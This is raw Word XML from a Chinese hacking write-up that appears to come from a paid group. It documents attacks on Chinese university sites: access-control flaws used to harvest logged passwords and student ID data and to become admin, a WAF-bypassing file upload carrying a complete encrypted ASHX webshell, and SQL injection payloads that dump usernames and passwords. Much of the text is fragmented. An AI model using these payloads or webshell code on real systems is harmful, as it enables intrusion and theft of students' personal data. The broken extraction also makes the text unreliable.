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球出事，知识星球以后由我更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没收一分钱勿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只是他出事的时候给我交代让我帮忙更新点，有些是库存历史洞了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漏洞点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越权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rl:http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//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xx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xxx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edu.cn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某开大学证书站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同系统不同站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思路一样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uperadmin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号登录获取日志接口信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passwor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替换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ecfe6335568d9aa8f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xxxxx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92bca</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5264150" cy="24028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志接口获取所有登录过的账号和密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post /sys/log/loadLogLoginAndOutList</w:t>
        <w:br/>
        <w:t>rows=10&amp;page=2&amp;order=asc&amp;remote_ip=&amp;username=&amp;startTime=&amp;endTime=</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5264150" cy="3490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拿获取的学生账号登录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xxxxxx</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal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a453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xxxxxxxxxx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eef6d9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口获取学生个人信息，身份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姓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/gradms/base/infoStutrainInfo/loadInfoStutrainInfoList?state=1</w:t>
        <w:br/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ET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改为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OST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传输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ows=10&amp;page=1&amp;order=asc&amp;orgCode=&amp;majorUniqueId=&amp;grade=&amp;perNum=&amp;perName=</w:t>
        <w:br/>
        <w:t>page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页数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4220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OST /auth/switchPosition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positionId=1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接成为管理员</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5269865" cy="1789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漏洞点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：文件上传</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>GetShe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漏洞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存在一处上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AF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>是安全狗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头像处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先上传一个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.jpg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的文件，然后抓包的时候改成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.html.ashx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然后记住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04DCCCA002D5F067BFD970D2CF37410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这样就绕过检测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上传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.ashx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会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waf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拦截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65420" cy="3618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然后继续吧得到的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Ticket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替换之前成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.html.ashx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然后插入免杀一句话，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.jpg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改成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.html.ashx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并且替换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ticket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改成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04DCCCA002D5F067BFD970D2CF37410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73675" cy="29267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WAF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检测文件名和内容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这里用到两个脚本一个是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ashx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免杀马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一个是生成文件的马，都能绕过安全狗检测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ashx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马：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&lt;%@ Language="C#" Class="Handler1" %&gt;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public class Handler1 : System.Web.IHttpHandler,System.Web.SessionState.IRequiresSessionState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{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:keepNext w:val="false"/>
        <w:keepLines w:val="false"/>
        <w:widowControl/>
        <w:spacing w:lineRule="atLeast" w:line="24"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="555555"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>public void ProcessRequest(System.Web.HttpContext Context) { try{string key = "202cb962ac59075b";string pass = "123";string md5 = System.BitConverter.ToString(new System.Security.Cryptography.MD5CryptoServiceProvider().ComputeHash(System.Text.Encoding.Default.GetBytes(pass + key))).Replace("-", "");byte[] data = System.Convert.FromBase64String(Context.Request[pass]);data = new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(System.Text.Encoding.Default.GetBytes(key), System.Text.Encoding.Default.GetBytes(key)).TransformFinalBlock(data, 0, data.Length);if (Context.Session["payload"] == null){ Context.Session["payload"] = (System.Reflection.Assembly)typeof(System.Reflection.Assembly).GetMethod("Load", new System.Type[] { typeof(byte[]) }).Invoke(null, new object[] { data }); ;}else{ object o = ((System.Reflection.Assembly)Context.Session["payload"]).CreateInstance("LY"); o.Equals(Context); o.Equals(data); byte[] r = System.Convert.FromBase64String(o.ToString()); Context.Response.Write(md5.Substring(0, 16)); Context.Response.Write(System.Convert.ToBase64String(new System.Security.Cryptography.RijndaelManaged().CreateEncryptor(System.Text.Encoding.Default.GetBytes(key), System.Text.Encoding.Default.GetBytes(key)).TransformFinalBlock(r, 0, r.Length))); Context.Response.Write(md5.Substring(16));}}catch(System.Exception){} } public bool IsReusable { get { return false; } } }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ashx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生成马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&lt;%@ WebHandler Language="C#" Class="Handler" %&gt;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using System;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using System.Web;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using System.IO;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public class Handler : IHttpHandler {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:keepNext w:val="false"/>
        <w:keepLines w:val="false"/>
        <w:widowControl/>
        <w:spacing w:lineRule="atLeast" w:line="24"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="555555"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>public void ProcessRequest (HttpContext context) { context.Response.ContentType = "text/plain"; //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="555555"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>偬</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="555555"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="555555"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>頤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目录遍历（全局都是遍历）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可以看到解析了并且内容也出来了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654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漏洞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注册随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一般都有头像上传或者申请要上传证件照什么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3188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35737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如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上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php-waf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拦截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64150" cy="30143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68595" cy="33953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Content-Disposition: form-data; name="file"; filename="1.html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ontent-Disposition: filename="."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双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ontent-Disposition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拼接绕过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判断第一个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filename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获取不到闭合换下行组合白名单闭合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绕过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漏洞点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：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>注入两处</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Bypass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注入点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/apps/MyVideo/TeacherSchool/MyStudent.aspx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注入绕过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sz w:val="21"/>
          <w:szCs w:val="21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1'+/</w:t>
      </w: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/AND+/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/(/</w:t>
      </w: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/SELECT/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/+2868+/</w:t>
      </w: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/FROM/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/+(/</w:t>
      </w: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/SELECT/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/(SLEEP(2)))pcFy)+/</w:t>
      </w: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/AND/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/+'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8417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https://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xxxx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.nankai.edu.cn/http/77726476706e69737468656265737421f2e30f92263e635177468ca88d1b203b/faq.php?action=grouppermission&amp;gids[99]=%27&amp;gids[100][0]=)%20and%20(select%201%20from%20(select%20count(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>),concat((select%20(select%20(select%20concat(username,0x27,password)%20from%20cdb_members%20limit%201)%20)%20from%20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C7254E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:fill="F8F8F8" w:val="clear"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>information_schema</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>.tables%20limit%200,1),floor(rand(0)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2))x%20from%20information_schema.tables%20group%20by%20x)a)%23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64150" cy="136398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成功注入出数据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4:05Z</dcterms:created>
  <dc:creator>P4ssExploit</dc:creator>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy>P4ssExploit</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-08-08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60764AFE45E1A08DDD25900E213E</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOProductBuildVer">
    <vt:lpwstr>2052-11.8.2.11542</vt:lpwstr>
  </property>
</Properties>
</file>